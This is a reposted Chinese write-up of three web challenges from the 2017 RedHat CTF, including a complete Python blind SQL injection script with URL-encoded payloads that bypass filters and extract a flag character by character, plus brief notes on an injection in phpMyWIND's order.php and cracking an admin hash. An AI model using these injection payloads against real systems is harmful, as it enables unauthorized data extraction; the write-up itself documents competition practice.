2017 redhat web writeup

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2017 redhat web writeup相关的知识,希望对你有一定的参考价值。

2017 RedHat Web writeup

1、thinkseeker

这题考两个点
1、用with rollup过前面两个if
2、用盲注找到flag
关于第一点在实验吧有原题:http://www.shiyanbar.com/ctf/1940
过滤方法稍有不同,用操作符代替关键字即可。token使用变量覆盖就可以。
第二点就是infoid这个参数有盲注,跑脚本可以拿到flag。
这是脚本:

  1. # -*- coding:utf-8 -*-
  2. import requests
  3. string = ‘‘
  4. for i in range(1,63):
  5. for j in range(32,127):
  6. url="http://106.75.117.4:3083/?token=21232f297a57a5a743894a0e4a801fc3&infoid=1%0a%26%26%0aascii(substr((select%0agroup_concat(flag)%0afrom%0aflag)from({})for(1)))={}&userid=1%0a||%0a1%0agroup%0aby%0apassword%0awith%0arollup%0alimit%0a1%0aoffset%0a1&password=".format(i,j)
  7. s=requests.get(url=url)
  8. content=s.content
  9. print i,j
  10. # 判断
  11. if "error sql!" not in content:
  12. string+=chr(j)
  13. break
  14. print string

最后答案:
技术分享
还是SQL注入做的少了,很多语句都不会写了。

2、phpMyWIND

这题漏洞太多了,随便一扫出了3个xss,我就执着的认为就是XSS的题目,一度以为是自己的XSS平台出问题了,其实就是order.php下面有个注入,参考文章http://0day5.com/archives/1442/
注意设置一下cookie防止跳转
技术分享
解开md5之后登陆管理员,找到这个
技术分享
访问拿到flag

3、后台

脑洞题,密码就是日期20170506
技术分享
其实根目录下还有一个flag.php,我一开始以为是要读这个文件,,



















以上是关于2017 redhat web writeup的主要内容,如果未能解决你的问题,请参考以下文章

NJCTF2017 Web Writeup

2017年第二届广东省强网杯线上赛WEB:Musee de X writeup(模板注入漏洞)

bugku-writeup-web-源代码

BuuCTF Web Writeup 第二部分

Geek2017 粗心的李超_writeup——网页表单提交备份文件泄露

XCTF-web的writeup(1--4)